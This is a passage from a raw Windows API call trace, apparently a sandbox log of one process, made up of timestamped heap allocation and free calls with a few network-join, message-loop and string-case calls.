hHeap=0xbe0000) returned 1 [0248.596] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d558 [0248.596] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53240 [0248.596] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53280 [0248.596] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53230 [0248.596] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20002) returned 0xe82c00 [0248.596] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53240 | out: hHeap=0xbe0000) returned 1 [0248.596] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53280 | out: hHeap=0xbe0000) returned 1 [0248.596] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53230 | out: hHeap=0xbe0000) returned 1 [0248.596] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d558 | out: hHeap=0xbe0000) returned 1 [0248.596] NetGetJoinInformation (in: lpServer="", lpNameBuffer=0x8be950, BufferType=0x8be968 | out: lpNameBuffer=0x8be950*="WORKGROUP", BufferType=0x8be968) returned 0x0 [0248.597] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53230 [0248.597] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x214) returned 0xe61b90 [0248.597] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf88e0 [0248.598] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf88f8 [0248.598] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf63a8 [0248.598] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf88b0 [0248.598] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53280 [0248.598] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf88b0 | out: hHeap=0xbe0000) returned 1 [0248.598] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53280 | out: hHeap=0xbe0000) returned 1 [0248.598] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf63a8 | out: hHeap=0xbe0000) returned 1 [0248.598] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf63a8 [0248.598] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf88b0 [0248.598] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf88c8 [0248.598] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53280 [0248.598] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe82c00 | out: hHeap=0xbe0000) returned 1 [0248.598] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6378 [0248.598] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8880 [0248.598] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8898 [0248.598] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53240 [0248.598] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8898 | out: hHeap=0xbe0000) returned 1 [0248.598] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53240 | out: hHeap=0xbe0000) returned 1 [0248.598] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8880 | out: hHeap=0xbe0000) returned 1 [0248.598] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8880 [0248.598] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8898 [0248.598] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6348 [0248.598] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53240 [0248.599] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6348 | out: hHeap=0xbe0000) returned 1 [0248.599] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53240 | out: hHeap=0xbe0000) returned 1 [0248.599] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8898 | out: hHeap=0xbe0000) returned 1 [0248.599] FreeLibrary (hLibModule=0x74480000) returned 1 [0248.602] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53270 | out: hHeap=0xbe0000) returned 1 [0248.602] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53260 | out: hHeap=0xbe0000) returned 1 [0248.602] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53250 | out: hHeap=0xbe0000) returned 1 [0248.602] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d580 | out: hHeap=0xbe0000) returned 1 [0248.602] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8c10 | out: hHeap=0xbe0000) returned 1 [0248.602] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53290 | out: hHeap=0xbe0000) returned 1 [0248.602] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf64c8 | out: hHeap=0xbe0000) returned 1 [0248.602] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6498 | out: hHeap=0xbe0000) returned 1 [0248.602] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8910 | out: hHeap=0xbe0000) returned 1 [0248.602] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8be0 | out: hHeap=0xbe0000) returned 1 [0248.602] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf63d8 | out: hHeap=0xbe0000) returned 1 [0248.602] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8c28 | out: hHeap=0xbe0000) returned 1 [0248.602] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6678 | out: hHeap=0xbe0000) returned 1 [0248.602] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf66d8 | out: hHeap=0xbe0000) returned 1 [0248.602] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8ac0 | out: hHeap=0xbe0000) returned 1 [0248.602] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6588 | out: hHeap=0xbe0000) returned 1 [0248.602] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8ad8 | out: hHeap=0xbe0000) returned 1 [0248.602] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8a90 | out: hHeap=0xbe0000) returned 1 [0248.602] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8c70 | out: hHeap=0xbe0000) returned 1 [0248.602] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8b50 | out: hHeap=0xbe0000) returned 1 [0248.602] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8c40 | out: hHeap=0xbe0000) returned 1 [0248.602] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6738 | out: hHeap=0xbe0000) returned 1 [0248.602] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8c58 | out: hHeap=0xbe0000) returned 1 [0248.602] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe01730 | out: hHeap=0xbe0000) returned 1 [0248.602] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe532a0 | out: hHeap=0xbe0000) returned 1 [0248.603] PeekMessageW (in: lpMsg=0x8befb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8befb4) returned 0 [0248.603] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe532a0 [0248.603] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20a) returned 0xe67f28 [0248.603] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53290 [0248.603] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe67f28 | out: hHeap=0xbe0000) returned 1 [0248.603] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53290 | out: hHeap=0xbe0000) returned 1 [0248.603] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe532a0 | out: hHeap=0xbe0000) returned 1 [0248.603] PeekMessageW (in: lpMsg=0x8befb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8befb4) returned 0 [0248.603] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d580 [0248.603] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8c58 [0248.603] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe532a0 [0248.603] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8c58 | out: hHeap=0xbe0000) returned 1 [0248.603] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d558 [0248.603] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8c58 [0248.603] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6738 [0248.603] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53290 [0248.603] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6738 | out: hHeap=0xbe0000) returned 1 [0248.603] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53250 [0248.603] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53250 | out: hHeap=0xbe0000) returned 1 [0248.603] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53290 | out: hHeap=0xbe0000) returned 1 [0248.603] PeekMessageW (in: lpMsg=0x8befb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8befb4) returned 0 [0248.603] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d828 [0248.603] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6738 [0248.603] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53290 [0248.604] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8c40 [0248.604] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8b50 [0248.604] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53250 [0248.604] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8b50 | out: hHeap=0xbe0000) returned 1 [0248.604] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d878 [0248.604] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8b50 [0248.604] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53260 [0248.604] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8c70 [0248.604] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53270 [0248.604] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x18) returned 0xe40af0 [0248.604] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53240 [0248.604] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d8a0 [0248.604] CharUpperBuffW (in: lpsz="_BUFFERSIZE", cchLength=0xb | out: lpsz="_BUFFERSIZE") returned 0xb [0248.604] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d8a0 | out: hHeap=0xbe0000) returned 1 [0248.604] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53240 | out: hHeap=0xbe0000) returned 1 [0248.604] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d8a0 [0248.604] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x1) returned 0xe53240 [0248.604] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d8c8 [0248.604] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8a90 [0248.604] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53220 [0248.604] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53220 | out: hHeap=0xbe0000) returned 1 [0248.604] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xdf8ad8 [0248.605] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d8f0 [0248.605] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6588 [0248.605] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53220 [0248.605] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8ac0 [0248.605] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x40) returned 0xe01730 [0248.605] PeekMessageW (in: lpMsg=0x8be964, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8be964) returned 0 [0248.605] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d918 [0248.605] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf66d8 [0248.605] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53210 [0248.605] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6678 [0248.605] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8c28 [0248.605] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53200 [0248.605] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8c28 | out: hHeap=0xbe0000) returned 1 [0248.605] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d940 [0248.605] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8c28 [0248.605] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe531f0 [0248.605] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf63d8 [0248.605] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe531f0 | out: hHeap=0xbe0000) returned 1 [0248.605] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8be0 [0248.605] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe531f0 [0248.605] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8910 [0248.605] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe531f0 | out: hHeap=0xbe0000) returned 1 [0248.606] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6498 [0248.606] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe531f0 [0248.606] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf64c8 [0248.606] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe531f0 | out: hHeap=0xbe0000) returned 1 [0248.606] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8c10 [0248.606] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe531f0 [0248.606] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8940 [0248.606] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe531f0 | out: hHeap=0xbe0000) returned 1 [0248.606] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8b38 [0248.606] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe531f0 [0248.606] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe531f0 | out: hHeap=0xbe0000) returned 1 [0248.606] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6528 [0248.606] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe531f0 [0248.606] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8a30 [0248.606] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe531f0 | out: hHeap=0xbe0000) returned 1 [0248.606] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8af0 [0248.606] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe531f0 [0248.606] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe531f0 | out: hHeap=0xbe0000) returned 1 [0248.606] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe531f0 [0248.607] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0248.616] NetApiBufferSize (in: Buffer=0xe08b68, ByteCount=0x8be300 | out: ByteCount=0x8be300) returned 0x0 [0248.618] PeekMessageW (in: lpMsg=0x8be964, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8be964) returned 1 [0248.618] TranslateMessage (lpMsg=0x8be964) returned 0 [0248.618] DispatchMessageW (lpMsg=0x8be964) returned 0xffffffff [0248.618] GetForegroundWindow () returned 0x10058 [0248.618] GetWindowLongW (hWnd=0x10058, nIndex=-21) returned 0 [0248.618] PeekMessageW (in: lpMsg=0x8be964, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8be964) returned 0 [0248.618] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53200 [0248.618] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20a) returned 0xe68148 [0248.619] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe531f0 [0248.619] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe68148 | out: hHeap=0xbe0000) returned 1 [0248.619] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe531f0 | out: hHeap=0xbe0000) returned 1 [0248.619] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe531f0 [0248.619] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x18) returned 0xe40b10 [0248.619] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe531c0 [0248.619] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe531c0 | out: hHeap=0xbe0000) returned 1 [0248.619] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe531c0 [0248.619] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x18) returned 0xe40ab0 [0248.619] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe531c0 | out: hHeap=0xbe0000) returned 1 [0248.619] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe40ab0 | out: hHeap=0xbe0000) returned 1 [0248.619] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe40b10 | out: hHeap=0xbe0000) returned 1 [0248.619] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe531f0 | out: hHeap=0xbe0000) returned 1 [0248.619] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53200 | out: hHeap=0xbe0000) returned 1 [0248.619] PeekMessageW (in: lpMsg=0x8be964, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8be964) returned 0 [0248.619] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53200 [0248.619] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe531f0 [0248.619] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe531f0 | out: hHeap=0xbe0000) returned 1 [0248.619] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53200 | out: hHeap=0xbe0000) returned 1 [0248.619] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe01730 | out: hHeap=0xbe0000) returned 1 [0248.619] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8ac0 | out: hHeap=0xbe0000) returned 1 [0248.619] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6588 | out: hHeap=0xbe0000) returned 1 [0248.619] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53220 | out: hHeap=0xbe0000) returned 1 [0248.620] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d8f0 | out: hHeap=0xbe0000) returned 1 [0248.620] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf62e8 | out: hHeap=0xbe0000) returned 1 [0248.620] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf87f0 | out: hHeap=0xbe0000) returned 1 [0248.620] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8808 | out: hHeap=0xbe0000) returned 1 [0248.620] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8838 | out: hHeap=0xbe0000) returned 1 [0248.620] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe67f28 | out: hHeap=0xbe0000) returned 1 [0248.620] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe531e0 | out: hHeap=0xbe0000) returned 1 [0248.620] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6678 | out: hHeap=0xbe0000) returned 1 [0248.620] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf66d8 | out: hHeap=0xbe0000) returned 1 [0248.620] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53210 | out: hHeap=0xbe0000) returned 1 [0248.620] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d918 | out: hHeap=0xbe0000) returned 1 [0248.620] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8ad8 | out: hHeap=0xbe0000) returned 1 [0248.620] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53240 | out: hHeap=0xbe0000) returned 1 [0248.620] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d8a0 | out: hHeap=0xbe0000) returned 1 [0248.620] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8a90 | out: hHeap=0xbe0000) returned 1 [0248.620] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d8c8 | out: hHeap=0xbe0000) returned 1 [0248.620] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8a90 [0248.620] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8ad8 [0248.620] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53240 [0248.620] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53210 [0248.620] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d8c8 [0248.620] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8ad8 | out: hHeap=0xbe0000) returned 1 [0248.620] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53240 | out: hHeap=0xbe0000) returned 1 [0248.620] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8a90 | out: hHeap=0xbe0000) returned 1 [0248.621] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8a90 [0248.621] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8a90 | out: hHeap=0xbe0000) returned 1 [0248.621] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe40af0 | out: hHeap=0xbe0000) returned 1 [0248.621] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53270 | out: hHeap=0xbe0000) returned 1 [0248.621] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53260 | out: hHeap=0xbe0000) returned 1 [0248.621] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8a90 [0248.621] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53260 [0248.621] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53260 | out: hHeap=0xbe0000) returned 1 [0248.621] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x14) returned 0xe40af0 [0248.621] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53260 [0248.621] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d8a0 [0248.621] CharLowerBuffW (in: lpsz="wchar[40]", cchLength=0x9 | out: lpsz="wchar[40]") returned 0x9 [0248.621] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x24) returned 0xe08988 [0248.621] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8ad8 [0248.621] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53270 [0248.621] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf66d8 [0248.621] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53240 [0248.621] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6678 [0248.621] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe531e0 [0248.621] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8838 [0248.621] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53220 [0248.621] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8838 | out: hHeap=0xbe0000) returned 1 [0248.622] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53220 | out: hHeap=0xbe0000) returned 1 [0248.622] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6678 | out: hHeap=0xbe0000) returned 1 [0248.622] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe531e0 | out: hHeap=0xbe0000) returned 1 [0248.622] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf66d8 | out: hHeap=0xbe0000) returned 1 [0248.622] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53240 | out: hHeap=0xbe0000) returned 1 [0248.622] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d8a0 | out: hHeap=0xbe0000) returned 1 [0248.622] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53260 | out: hHeap=0xbe0000) returned 1 [0248.622] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d8c8 | out: hHeap=0xbe0000) returned 1 [0248.622] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53210 | out: hHeap=0xbe0000) returned 